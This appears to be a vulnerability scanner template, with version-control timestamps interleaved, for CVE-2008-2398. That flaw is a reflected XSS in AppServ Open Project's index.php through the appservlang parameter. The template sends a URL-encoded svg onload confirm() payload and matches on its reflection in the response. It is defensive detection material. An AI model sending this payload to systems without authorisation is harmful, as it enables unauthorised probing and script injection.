2021-01-02 05:02:50 +00:00
id : CVE-2008-2398
2020-12-15 19:50:04 +00:00
info :
name : AppServ Open Project 2.5.10 and earlier XSS
author : unstabl3
severity : medium
2021-04-22 08:59:05 +00:00
description : Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference : https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
2021-02-05 19:44:41 +00:00
tags : cve,cve2008,xss
2020-12-15 19:50:04 +00:00
requests :
- method : GET
path :
2020-12-25 15:04:57 +00:00
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
2020-12-16 05:36:39 +00:00
2020-12-15 19:50:04 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2020-12-25 15:04:57 +00:00
- "<svg/onload=confirm('xss')>"
2020-12-15 19:50:04 +00:00
part : body
2020-12-16 05:36:39 +00:00
- type : word
words :
- "text/html"
part : header
